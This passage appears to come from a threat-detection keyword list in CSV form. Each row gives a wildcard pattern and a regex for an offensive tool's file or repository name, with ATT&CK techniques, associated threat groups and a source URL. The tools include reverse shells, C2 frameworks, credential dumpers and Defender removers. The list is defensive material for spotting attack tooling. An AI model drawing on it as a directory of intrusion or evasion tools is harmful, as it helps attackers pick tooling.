Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10365"
"*/Remote/unexpireuser/*",".{0,1000}\/Remote\/unexpireuser\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10366"
"*/RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\/RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","10367"
"*/Remote-administration-tools-archive.git*",".{0,1000}\/Remote\-administration\-tools\-archive\.git.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10368"
"*/remotedesktop.exe*",".{0,1000}\/remotedesktop\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10371"
"*/RemoteHashRetrieval.ps1*",".{0,1000}\/RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","10372"
"*/RemoteKrbRelay.git*",".{0,1000}\/RemoteKrbRelay\.git.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","1","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","10378"
"*/RemoteMaintsvc.exe*",".{0,1000}\/RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","10379"
"*/RemoteMaintsvc.exe*",".{0,1000}\/RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","10380"
"*/remote-method-guesser.git*",".{0,1000}\/remote\-method\-guesser\.git.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","10381"
"*/RemoteOps.py*",".{0,1000}\/RemoteOps\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","10383"
"*/RemotePenetration.exe*",".{0,1000}\/RemotePenetration\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10396"
"*/RemotePotato0.git*",".{0,1000}\/RemotePotato0\.git.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","10397"
"*/RemotePotato0.zip*",".{0,1000}\/RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","10398"
"*/remotereg.c*",".{0,1000}\/remotereg\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","10399"
"*/remotereg.o*",".{0,1000}\/remotereg\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","10400"
"*/remoteshell.py*",".{0,1000}\/remoteshell\.py.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","10401"
"*/remoteshell.py*",".{0,1000}\/remoteshell\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","10402"
"*/Remove_defender_moduled*",".{0,1000}\/Remove_defender_moduled.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","10403"
"*/request_shellcode.exe*",".{0,1000}\/request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10404"
"*/resocks * --key *",".{0,1000}\/resocks\s.{0,1000}\s\-\-key\s.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10406"
"*/resocks.git*",".{0,1000}\/resocks\.git.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10407"
"*/resocks/releases/latest*",".{0,1000}\/resocks\/releases\/latest.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10408"
"*/resocks_*_Linux_x86_64.tar.gz*",".{0,1000}\/resocks_.{0,1000}_Linux_x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10409"
"*/resocks_*_macOS_arm64.tar.gz*",".{0,1000}\/resocks_.{0,1000}_macOS_arm64\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10410"
"*/resocks_Darwin_x86_64.tar.gz*",".{0,1000}\/resocks_Darwin_x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10411"
"*/resocks_Linux_*.tar.gz*",".{0,1000}\/resocks_Linux_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","#linux","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","10412"
"*/resolveall.nse*",".{0,1000}\/resolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10413"
"*/resources/PROCEXP.sys*",".{0,1000}\/resources\/PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","10414"
"*/Resources/Webcam.dll*",".{0,1000}\/Resources\/Webcam\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","10415"
"*/Responder.git*",".{0,1000}\/Responder\.git.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","10416"
"*/responder/Responder.conf *",".{0,1000}\/responder\/Responder\.conf\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","10417"
"*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10418"
"*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","10419"
"*/Responder-master.zip*",".{0,1000}\/Responder\-master\.zip.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","10420"
"*/Responder-Session.log*",".{0,1000}\/Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#linux","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","10421"
"*/Responder-Windows.git*",".{0,1000}\/Responder\-Windows\.git.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","1","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","10422"
"*/restoresig.py*",".{0,1000}\/restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","10429"
"*/returnvar/wce/*",".{0,1000}\/returnvar\/wce\/.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","10430"
"*/rev_shell.py*",".{0,1000}\/rev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","10431"
"*/revbshell.git*",".{0,1000}\/revbshell\.git.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","1","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","10432"
"*/Reverse Shell Tab -->*",".{0,1000}\/Reverse\sShell\sTab\s\-\-\>.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10433"
"*/reverse.exe*",".{0,1000}\/reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10434"
"*/reverse-index.nse*",".{0,1000}\/reverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10435"
"*/ReverseShell.ahk*",".{0,1000}\/ReverseShell\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","10436"
"*/reverseShell-1.0.1-zip.zip*",".{0,1000}\/reverseShell\-1\.0\.1\-zip\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","10437"
"*/reverse-shellcode.cpp*",".{0,1000}\/reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","10438"
"*/reverse-shell-generator*",".{0,1000}\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","N/A","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10439"
"*/reverse-shell-generator.git*",".{0,1000}\/reverse\-shell\-generator\.git.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10440"
"*/ReverseSock5Proxy.git*",".{0,1000}\/ReverseSock5Proxy\.git.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","10441"
"*/ReverseSock5Proxy/tarball/*",".{0,1000}\/ReverseSock5Proxy\/tarball\/.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","10442"
"*/ReverseSock5Proxy/zipball/*",".{0,1000}\/ReverseSock5Proxy\/zipball\/.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","10443"
"*/reverse-ssh.git*",".{0,1000}\/reverse\-ssh\.git.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10444"
"*/reverse-ssh/*",".{0,1000}\/reverse\-ssh\/.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#linux","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10445"
